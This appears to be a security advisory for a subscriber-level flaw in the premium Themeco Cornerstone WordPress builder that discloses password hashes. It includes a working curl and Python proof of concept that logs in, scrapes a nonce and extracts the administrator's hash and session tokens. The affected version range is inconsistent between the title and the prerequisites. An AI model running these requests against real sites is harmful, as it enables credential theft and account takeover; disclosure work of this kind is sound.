Themeco Cornerstone < 7.8.8 (Premium, bundled with X Theme) – Subscriber+ Arbitrary User Password Hash Disclosure | CVE 2026-9710

Description

The plugin does not enforce capability checks on one of its CSS-preview request handlers, and exposes the nonce needed to call it to every logged-in user on any wp-admin page, allowing any authenticated user to evaluate dynamic content tokens against arbitrary users and disclose their sensitive metadata including raw password hashes. This affects the premium Themeco Cornerstone page builder distributed bundled with the X Theme, not the unrelated free `cornerstone` plugin (v0.8.x) on the .org repository.

Proof of Concept

Prerequisites:
- Active premium Themeco Cornerstone (any version up to 7.8.5, distributed inside X Theme 10.8.5 and earlier from theme.co).
- Any user account with a role from Subscriber upward.

Steps to reproduce:

1) Authenticate as a Subscriber:

   curl -sk -c jar -X POST "https://TARGET/wp-login.php" \
     --data-urlencode "log=subscriber" \
     --data-urlencode "pwd=PASSWORD" \
     --data-urlencode "wp-submit=Log In" \
     --data-urlencode "redirect_to=https://TARGET/wp-admin/" \
     --data-urlencode "testcookie=1" -o /dev/null

2) Fetch any wp-admin page (e.g. /wp-admin/profile.php) and extract the Cornerstone admin nonce that is unconditionally injected into the page for every logged-in user:

   curl -sk -b jar "https://TARGET/wp-admin/profile.php" -o profile.html
   CS_NONCE=$(python3 -c 'import re,json,sys;h=open("profile.html").read();m=re.search(r"csAdminData\s*=\s*({.*?});",h,re.DOTALL);print(json.loads(m.group(1))["common"]["_cs_nonce"])')

3) POST the dynamic-content payload targeting administrator user_id=1 to the CSS preview endpoint:

   curl -sk -b jar -X POST "https://TARGET/?cs-css=1" \
     -H "Content-Type: application/json" \
     --data "{\"_nonce\":\"$CS_NONCE\",\"request\":{\"type\":\"post-process-css\",\"previewState\":{\"documentId\":1,\"settings\":{}},\"items\":[{\"css\":\"{{dc:user:meta key=\\\"user_pass\\\" user=\\\"1\\\"}}\"}]}}"

Expected result: HTTP 200 with a JSON body of the shape:

  {"success":true,"data":["$wp$2y$12$/Hv35jQTt91LS5w9I6t8G.td0VsgQSqzvu7qw1tSwh.O2swfIrLvK"]}

The `data[0]` value is the raw `user_pass` column for the requested user (bcrypt for current WP installs, PHPass for older ones), exfiltrated directly from `wp_users` and suitable for offline cracking. Any meta key can be requested by changing the `key=` argument (for example `wp_capabilities`, `session_tokens`).